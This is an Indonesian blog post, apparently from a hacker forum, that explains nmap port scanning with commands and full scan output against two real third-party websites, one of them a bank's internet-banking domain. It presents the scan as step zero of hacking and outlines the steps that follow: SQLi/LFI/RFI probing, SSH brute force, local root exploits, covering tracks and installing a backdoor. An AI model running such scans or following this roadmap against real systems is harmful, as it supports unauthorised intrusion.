disini saya akan menjelaskan port scaning dengan scaner nmap, <i data-iceapw="4">what is nmap ??</i> oke buat yang belum tau nmap :<br />
<blockquote class="tr_bq">Nmap (“Network Mapper”) merupakan sebuah tool open source untuk  eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa  jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap  host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih  untuk menentukan host mana saja yang tersedia pada jaringan, layanan  (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan  versinya) apa yang digunakan, apa jenis firewall/filter paket yang  digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya  digunakan untuk audit keamanan, namun banyak administrator sistem dan  jaringan menganggapnya berguna untuk tugas rutin seperti inventori  jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring  uptime host atau layanan.<br />
<a href="http://nmap.org/man/id/" target="_blank">http://nmap.org/man/id/</a></blockquote>nmap bisa di <span class="IL_AD" id="IL_AD2">download</span> <a href="http://nmap.org/download.html" target="_blank">disini</a><br />
<br />
meskipun ada yang GUI tapi yang akan saya jelaskan adalah scaning dengan commandline karena itu adalah basicnya.. <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/4.gif" title="tersenyum lebar" /><br />
<br />
oke akan saya contohkan 2 target yaitu :<br />
<a href="http://www.hakzsite.us/" target="_blank">www.hakzsite.us</a><br />
<a href="http://www.ibank.klikbca.com/" target="_blank">www.ibank.klikbca.com</a><br />
<blockquote class="tr_bq"><pre class="bbcode_code" data-iceapw="306" style="height: 564px;"># nmap -v -sS -O www.hakzsite.us
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-13 00:01 SE Asia <span class="IL_AD" id="IL_AD10">Standard Time</span>

Initiating Ping Scan at 00:01
Scanning www.hakzsite.us (209.51.196.244) [4 ports]
Completed Ping Scan at 00:01, 0.75s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:01
Completed Parallel DNS resolution of 1 host. at 00:01, 0.33s elapsed
Initiating SYN Stealth Scan at 00:01
Scanning www.hakzsite.us (209.51.196.244) [1000 ports]
Discovered open port 80/tcp on 209.51.196.244
Discovered open port 25/tcp on 209.51.196.244
Discovered open port 443/tcp on 209.51.196.244
Increasing send delay for 209.51.196.244 from 0 to 5 due to 34 out of 111 droppe
d probes since last increase.
Completed SYN Stealth Scan at 00:02, 33.74s elapsed (1000 total ports)
Initiating OS detection (try #1) against www.hakzsite.us (209.51.196.244)
Retrying OS detection (try #2) against www.hakzsite.us (209.51.196.244)
Nmap scan report for www.hakzsite.us (209.51.196.244)
Host is up (0.31s latency).
rDNS record for 209.51.196.244: f4.c4.33.static.xlhost.com
Not shown: 996 closed ports
PORT     STATE    SERVICE
25/tcp   open     smtp
80/tcp   open     http
443/tcp  open     https
1025/tcp filtered NFS-or-IIS
Device type: WAP|storage-misc|general purpose|firewall
Running (JUST GUESSING) : AVM embedded (94%), Netgear embedded (94%), Linksys em
bedded (94%), <span class="IL_AD" id="IL_AD1">Western Digital</span> Linux 2.6.X (89%), Linux 2.6.X (85%), ISS Linux 2.
4.X (85%)
Aggressive OS guesses: AVM FRITZ!Box FON WLAN 7050, Linksys WAG200G, or Netgear
DG834GT <span class="IL_AD" id="IL_AD3">wireless</span> <span class="IL_AD" id="IL_AD12">broadband router</span> (94%), Western Digital MyBook World Edition 2
NAS device (Linux 2.6.17.14) (89%), Linux 2.6.20-gentoo-r8 (Gentoo, x86, SMP) (8
5%), ISS Proventia GX3002C firewall (Linux 2.4.18) (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 31.393 days (since Wed Jan 12 14:36:20 2011)
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros

Read <span class="IL_AD" id="IL_AD8">data files</span> from: C:\<span class="IL_AD" id="IL_AD9">Program Files</span>\Nmap
OS detection performed. Please report any incorrect results at http://nmap.org/s
ubmit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.04 seconds
           Raw packets sent: 1160 (56.064KB) | Rcvd: 1068 (43.268KB)</pre></blockquote><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
terlihat ada 4 port yang terbuka <br />
PORT     STATE    SERVICE<br />
25/tcp   open     smtp<br />
80/tcp   open     http<br />
443/tcp  open     https<br />
1025/tcp filtered NFS-or-IIS<br />
<blockquote class="tr_bq"><br />
<pre class="bbcode_code" data-iceapw="74" style="height: 132px;"># nmap -v -sS -O www.ibank.clikbca.com
Starting Nmap 5.21 ( http://nmap.org ) at 2011-02-13 00:07 SE Asia Standard Time

Failed to resolve given hostname/IP: www.ibank.klikbca.com.  Note that you can't
 use '/mask' AND '1-4,7,100-' style IP ranges
Read data files from: C:\Program Files\Nmap
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.46 seconds
           Raw packets sent: 0 (0B) | Rcvd: 0 (0B)</pre></blockquote>ibank.klikbca.com merupakan situs yang paling serius pertahanannya.  Bahkan oleh nmap yang melakukan stealth probe gagal untuk melihat port yang aktif di ibank.klikbca.com meskipun ada port yang aktif tapi telah ditutup oleh firewall demi keamanannya.<br />
<br />
Penjelasan perintah :: <br />
<br />
# nmap [tipe scan] [option] nama-target-mesin <br />
<br />
-sS : Menggunakan Syn Scan<br />
-sT : Menggunakan Connect Scan<br />
-sU : UDP Scan<br />
-sV : Menentukan info service/version dari port yang ada<br />
<br />
lengkapnya ada <a href="http://nmap.org/book/man.html" target="_blank">disni</a><br />
<br />
setelah kita mengetahui apa saja port yang terbuka barulah kita bisa melanjutkan ke tahap berikutnya sesuai port tersebut. ingat kita baru mencapai langkah ke 0 dimana kita berusaha mendapatkan informasi mengenai situs target. <br />
misal port yang terbuka adalah <br />
80/http = kita mulai mencari bug atau vulnerability melalui urlnya misal SQLI, LFI, RFI, dsb<br />
22/ssh = kita bisa mencoba melakukan bruteforce login ssh bila sukses  kita jadi ssh tinggal cari exploit localrootnya buat dapetin root  access.<br />
dsb.<br />
langkah berikutnya adalah :<br />
Step 1: Memperoleh akses ke situs.<br />
<br />
Step 2: Menghack root.<br />
<br />
Step 3: Menutupi bekas-bekas anda.<br />
<br />
Step 4: Membuat backdoor untuk menjaga account.<br />
Kita baru mencapai Step 0, usaha untuk membuka akses ke situs.<br />
untuk langkah 1-4 udah banyak yang sharing jadi saya diam saja.. <img alt="" border="0" class="inlineimg" src="http://www.indonesianhacker.or.id/images/smilies/4.gif" title="tersenyum lebar" /><br />
misal ada port yang mencurigakan biasanya bisa di akses melalui port 80/http<br />
contoh :<br />
<blockquote class="tr_bq"><pre class="bbcode_code" data-iceapw="13" style="height: 48px;">www.situstesting.com:port
*port di ganti dengan angka sesuai dengan port yang terbuka</pre></blockquote><i data-iceapw="54">NB : Port scanning ini mungkin banyak di lupakan,  dilewati, atau emang sengaja ga tau dalam proses hacking.. padahal  sebenarnya langkah awal ini adalah langkah penting untuk menentukan cara  atacking selanjutnya, kadang orang blibet sampe jempalitan cari vuln  suatu web padahal vulnnya cuma di PhpMyAdmin atau ada portlain yang  terbuka tapi settingan masih default..</i>

Implementasi Port Scanning

Adalah langkah awal yang harus kita lakukan sebelum kita melakukan aktivitas hacking jarak jauh (remote) yang berfungsi untuk melihat servis yang diberikan oleh server / target di Internet. Dalam ko…

03 Jun 2012

Load more posts